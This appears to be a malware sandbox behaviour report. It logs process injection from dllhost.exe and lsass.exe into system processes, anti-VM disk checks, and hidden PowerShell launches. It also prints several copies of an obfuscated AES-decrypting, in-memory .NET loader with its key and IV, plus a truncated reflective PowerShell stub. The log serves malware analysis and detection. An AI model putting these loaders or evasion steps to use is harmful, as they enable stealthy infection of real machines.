Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FED7750000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 178DCD40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 224138D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2310000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 26504E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FED7750000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 178DCD40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 224138D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 26504E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 16CE5E20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 2B90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 2E10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 23BCC520000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 23BCC550000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1D865090000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F0520000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 199015D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F2840000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1CB2E610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1CB2E640000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 188D6710000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 29F37400000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DE3D50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DFE070000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F2840000
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\1.cmd';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:amvxseuhmbvc{param([outputtype([type])][parameter(position=0)][type[]]$uiloijomlvxjkf,[parameter(position=1)][type]$qydjyvedmn)$nmmwpnxadvf=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+'r'+''+[char](101)+''+'f'+'l'+[char](101)+''+[char](99)+'t'+[char](101)+''+'d'+''+[char](68)+''+[char](101)+''+[char](108)+'e'+[char](103)+''+[char](97)+'t'+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+'n'+[char](77)+''+[char](101)+'m'+[char](111)+''+[char](114)+''+'y'+''+[char](77)+''+'o'+''+[char](100)+'u'+[char](108)+'e',$false).definetype('m'+[char](121)+'d'+[char](101)+''+[char](108)+''+[char](101)+''+[char](103)+''+[char](97)+''+[char](116)+''+[char](101)+''+[char](84)+'y'+[char](112)+'e',''+'c'+''+[char](108)+''+'a'+''+[char](115)+''+'s'+''+[char](44)+''+[char](80)+'ub'+'l'+'i'+[char](99)+','+[char](83)+''+[char](101)+'a'+'l'+''+[char](101)+'d'+[char](44)+'an'+[char](115)+'icla'+'s'+''+[char](115)+','+[char](65)+''+[char](117)+'t'+[char](111)+''+[char](67)+''+'l'+'as'+[char](115)+'',[multicastdelegate]);$nmmwpnxadvf.defineconstructor('r'+[char](84)+'s'+'p'+''+'e'